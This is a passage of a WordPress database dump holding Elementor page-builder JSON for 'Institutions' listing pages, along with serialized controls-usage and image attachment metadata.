,\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"709cf34\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b27ce91\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"dd929c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f4f627c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9603,1673,'_elementor_edit_mode','builder'),(9604,1673,'_elementor_template_type','wp-page'),(9605,1673,'_elementor_version','2.7.5'),(9606,1673,'_wp_page_template','default'),(9607,1673,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f205ddb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9609,1674,'_elementor_edit_mode','builder'),(9610,1674,'_elementor_template_type','wp-page'),(9611,1674,'_elementor_version','2.7.5'),(9612,1674,'_wp_page_template','default'),(9613,1674,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"7e314fe\",\"elType\":\"widget\",\"settings\":{\"prev_text\":\"Previous\",\"prev_icon\":\"fa fa-long-arrow-left\",\"next_text\":\"Next\",\"next_icon\":\"fa fa-long-arrow-left\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-pagination\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f205ddb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9616,1675,'_elementor_edit_mode','builder'),(9617,1675,'_elementor_template_type','wp-page'),(9618,1675,'_elementor_version','2.7.5'),(9619,1675,'_wp_page_template','default'),(9620,1675,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f205ddb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9629,1678,'_elementor_edit_mode','builder'),(9630,1678,'_elementor_template_type','wp-page'),(9631,1678,'_elementor_version','2.7.5'),(9632,1678,'_wp_page_template','default'),(9633,1678,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f205ddb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9634,1678,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:9:\"jet-posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:4;s:8:\"controls\";a:3:{s:7:\"content\";a:3:{s:15:\"section_general\";a:12:{s:6:\"number\";i:1;s:7:\"columns\";i:1;s:17:\"equal_height_cols\";i:1;s:9:\"post_type\";i:1;s:8:\"post_ids\";i:1;s:10:\"show_image\";i:1;s:12:\"show_excerpt\";i:1;s:14:\"excerpt_length\";i:1;s:14:\"show_terms_tax\";i:1;s:9:\"show_meta\";i:1;s:9:\"show_more\";i:1;s:10:\"show_terms\";i:1;}s:27:\"section_posts_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}s:16:\"section_carousel\";a:1:{s:16:\"slides_to_scroll\";i:1;}}s:5:\"style\";a:3:{s:17:\"section_box_style\";a:5:{s:6:\"box_bg\";i:1;s:17:\"box_border_border\";i:1;s:16:\"box_border_width\";i:1;s:16:\"box_border_color\";i:1;s:11:\"box_padding\";i:1;}s:21:\"section_content_style\";a:1:{s:15:\"content_padding\";i:1;}s:19:\"section_title_style\";a:6:{s:11:\"title_color\";i:1;s:17:\"title_color_hover\";i:1;s:27:\"title_typography_typography\";i:1;s:26:\"title_typography_font_size\";i:1;s:13:\"title_padding\";i:1;s:12:\"title_margin\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:2:{s:7:\"_margin\";i:1;s:8:\"_padding\";i:1;}}}}}'),(9654,576,'old_name','file_type_image'),(9656,1686,'_wp_attached_file','2019/11/pdf.png'),(9657,1686,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:15:\"2019/11/pdf.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"pdf-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"pdf-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}